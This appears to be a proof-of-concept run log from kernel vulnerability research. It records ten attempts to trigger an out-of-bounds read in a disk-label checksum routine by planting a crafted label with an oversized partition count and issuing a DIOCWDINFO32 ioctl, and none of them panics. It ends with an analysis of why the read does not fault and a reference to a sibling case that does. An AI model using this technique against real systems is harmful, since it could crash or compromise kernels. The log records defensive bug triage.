DF-0106 / run.log
=== iter 1 ===
[*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512
[*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512)
[*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk
poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process
rc=0
=== iter 2 ===
[*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512
[*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512)
[*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk
poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process
rc=0
=== iter 3 ===
[*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512
[*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512)
[*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk
poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process
rc=0
=== iter 4 ===
[*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512
[*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512)
[*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk
poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process
rc=0
=== iter 5 ===
[*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512
[*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512)
[*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk
poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process
rc=0
=== iter 6 ===
[*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512
[*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512)
[*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk
poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process
rc=0
=== iter 7 ===
[*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512
[*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512)
[*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk
poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process
rc=0
=== iter 8 ===
[*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512
[*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512)
[*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk
poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process
rc=0
=== iter 9 ===
[*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512
[*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512)
[*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk
poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process
rc=0
=== iter 10 ===
[*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512
[*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512)
[*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk
poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process
rc=0
LOOP_DONE_NO_PANIC

-----
OUTCOME: NO PANIC across 10 iterations (and 400+ in extended runs).
-----
dkcksum32 DID execute on the writedisklabel path (the loop at subr_disklabel32.c:363-364 evaluates dkcksum32(dlp) at sector offset 0 where the crafted label's d_magic/d_magic2 match), but the 1MiB OOB walk stays within the ~24MiB contiguous wired getpbuf_mem region (swapbkva_mem) and does not fault.
The missing-guard bug is confirmed in source; the identical root-cause panic is reproduced live via sibling DF-0107 (dkcksum32 from setdisklabel).